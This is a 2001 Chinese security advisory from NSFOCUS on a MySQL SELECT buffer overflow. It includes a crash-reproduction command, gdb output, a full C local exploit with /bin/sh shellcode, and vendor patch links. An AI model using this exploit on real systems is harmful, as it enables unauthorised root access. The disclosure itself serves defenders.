首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第18期->最新漏洞
日期:2001-02-05
受影响的系统:
T.C.X DataKonsult MySQL 3.23.30
T.C.X DataKonsult MySQL 3.23.29
T.C.X DataKonsult MySQL 3.23.28
T.C.X DataKonsult MySQL 3.23.27
T.C.X DataKonsult MySQL 3.23.26
T.C.X DataKonsult MySQL 3.23.25
T.C.X DataKonsult MySQL 3.23.24
T.C.X DataKonsult MySQL 3.23.23
不受影响系统:
T.C.X DataKonsult MySQL 3.23.31
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID :2262
MySQL是一个开放源代码的自由数据库软件。3.23.31以前的版本都存在一个缓冲区
溢出漏洞。
通过使用一个特别长的字符串作为SELECT语句的参数,可能导致mysqld发生缓冲区
溢出。堆栈中的数据可能被覆盖或修改,攻击者可能远程获取mysqld的运行权限或
使mysqld数据库崩溃。
<*来源:Joao Gouveia (tharbad@kaotik.org) *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Joao Gouveia提供了下列测试步骤:
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
></quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal i got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
> g "$@" >>$err_log 2>&1>
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> (gdb)
> </quote>
Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一个测试程序:
#include <stdio.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define NOP 0x90
// Our EVIL code...
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned
long get_sp(void) {
__asm__("movl %esp,%eax");
}
// Where it all happens...
main(int argc, char *argv[])
{
char *buffer, *ptr, tmp[1500];
long *addr_ptr, addr;
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;
printf("\nMySQL [al versions < 3.23.31] Local Exploit by
lms@ispgaya.pt\n\n");
if (argc==2) offset=atoi(argv[1]);
else
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");
printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
if (!(buffer = malloc(bsize))) {
printf("ERROR!\n");
printf("Couldn't allocate memory...\n");
printf("Exiting...\n");
exit(0);
}
printf("SUCCESS!\n");
addr=get_sp()-offset;
printf("Using address : 0x%x\n", addr);
printf("Offset : %d\n",offset);
printf("Buffer Size : %d\n",bsize);
ptr=buffer;
addr_ptr=(long *) ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
for (i=0;i<bsize/2;i++) buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buffer[bsize-1]='\0';
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
printf("Oh k...i have the evil'buffer right here :P\n");
printf("So...[if all went well], prepare to be r00t...\n");
system(tmp);
}
--------------------------------------------------------------------------------
建议:
厂商补丁:
NSFOCUS建议您立即升级到MySQL 3.23.31以上版本,它已经解决了这一问题。
厂商地址:http://www.mysql.com/
很多Linux厂商也提供了升级软件包:
【redhat】
Red Hat Linux 7.0:
SRPMS:
http://updates.redhat.com/7.0/SRPMS/mysql-3.23.32-1.7.src.rpm
http://updates.redhat.com/7.0/SRPMS/mysqlclient9-3.23.22-3.src.rpm
alpha:
http://updates.redhat.com/7.0/alpha/mysql-3.23.32-1.7.alpha.rpm
http://updates.redhat.com/7.0/alpha/mysql-devel-3.23.32-1.7.alpha.rpm
http://updates.redhat.com/7.0/alpha/mysql-server-3.23.32-1.7.alpha.rpm
http://updates.redhat.com/7.0/alpha/mysqlclient9-3.23.22-3.alpha.rpm
i386:
http://updates.redhat.com/7.0/i386/mysql-3.23.32-1.7.i386.rpm
http://updates.redhat.com/7.0/i386/mysql-devel-3.23.32-1.7.i386.rpm
http://updates.redhat.com/7.0/i386/mysql-server-3.23.32-1.7.i386.rpm
http://updates.redhat.com/7.0/i386/mysqlclient9-3.23.22-3.i386.rpm
【debian】
Debian GNU/Linux 2.2 alias potato
- ------------------------------------
Source archives:
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.diff.gz
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.dsc
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32.orig.tar.gz
Architecture independent:
http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-client_3.22.32-4_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-server_3.22.32-4_i386.deb
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-client_3.22.32-4_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-server_3.22.32-4_m68k.deb
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-client_3.22.32-4_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-server_3.22.32-4_sparc.deb
Alpha architecture:
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-client_3.22.32-4_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-server_3.22.32-4_alpha.deb
PowerPC architecture:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/php4-mysql_4.0.3pl1-0potato1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/mysql-server_3.22.32-4_powerpc.deb
ARM architecture:
http://security.debian.org/dists/stable/updates/main/binary-arm/mysql-server_3.22.32-4_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb
版权所有,未经许可,不得转载